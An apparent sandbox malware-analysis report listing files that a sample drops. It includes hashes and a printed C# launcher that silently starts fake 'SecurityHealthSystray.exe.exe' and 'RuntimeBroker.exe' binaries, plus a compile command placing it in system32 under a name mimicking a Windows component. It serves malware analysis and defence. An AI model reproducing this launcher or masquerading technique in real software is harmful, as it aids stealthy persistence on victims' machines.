                                                                                                            Entropy (8bit):4.89320327744359
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JZxv3iFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKz
                                                                                                            MD5:4E2E79ACE6C99F645E8D04C7BA820C12
                                                                                                            SHA1:849BF64D1685BEDBD63BF381A8C5063C692A6CB3
                                                                                                            SHA-256:06995A46EBDA846CDBDE4431495541FC3B57CA03A70C5B528777BFBC45B150DD
                                                                                                            SHA-512:A23BE91AD5805D29BDF310723F1801CD43678CF68586FDCA508DF6BAE2473B59B71B65C45F93777667D99ED18931B3293C16731302AF41450DDC2C2971701709
                                                                                                            Malicious:false
                                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                                                            C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):250
                                                                                                            Entropy (8bit):5.125992733475265
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f+WfU2P:Hu7L//TRq79cQWf2sLP
                                                                                                            MD5:2E1C2C05E117B7655C850B177B1ED81E
                                                                                                            SHA1:A3FBBE831F8E6DF4A39EFF18C32A2C94359F4582
                                                                                                            SHA-256:3D753ED873DB7DBFE5DE9134FB4F4676994D9A80C4EFEC606AB5E1842FB0A737
                                                                                                            SHA-512:E9BC328929267C69555C234E16C7175E9F5E62D3E9E2E31CBE885C9761CBE03EDDEC4C2D56B3F238C957FD782CE53E435BB1ABCA4D819408B82FE6F04F6851E6
                                                                                                            Malicious:true
                                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.0.cs"

                                                                                                            C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.out

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):750
                                                                                                            Entropy (8bit):5.267454687977641
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:KJN/I/u7L//TRq79cQWf2sL2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf2XKax5DqBVKVrdFAw
                                                                                                            MD5:C986AC6EEADACC1C8CB681B051A77949
                                                                                                            SHA1:CEBA857B2ED972BC19133591E0AAD5A245AA3CBE
                                                                                                            SHA-256:628EF19212C5287B800261960044C06EDEEFA93F8EA175C122709AA5730B1C06
                                                                                                            SHA-512:FA363E49CE7005A7ABDBA452B928F1131CF5E5887E64149A766D596DAF0F8F08B0B3E8F7ECBA97A10DB2C379D711CEE3C816CDC3F846AE65E2A1A124EB7A40FC
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                            C:\Users\user\AppData\Local\Temp\q1wvu2gbA9

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\qBo7iThgfj

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\qHbgtTAXCA

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\qMLscDfqpD

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\rYbP6VVH19

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\rkT0epRgwe

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\rrqafllUeS

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\sAAhGhBWLQ

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\sTll6qPV1G

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\sZnGKnWloG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):98304
                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\seQ7IRkhr1

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\t0MikPlXGf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\tANKlu2qTk

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\tjtCnMU4xK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\tmwSqXf0xP

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\tpYuBwJhMu

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\tv7jPOPECE

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\u0pqMhdtCG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\u1fNVTMfcd

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\u78bPEo5Ei

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
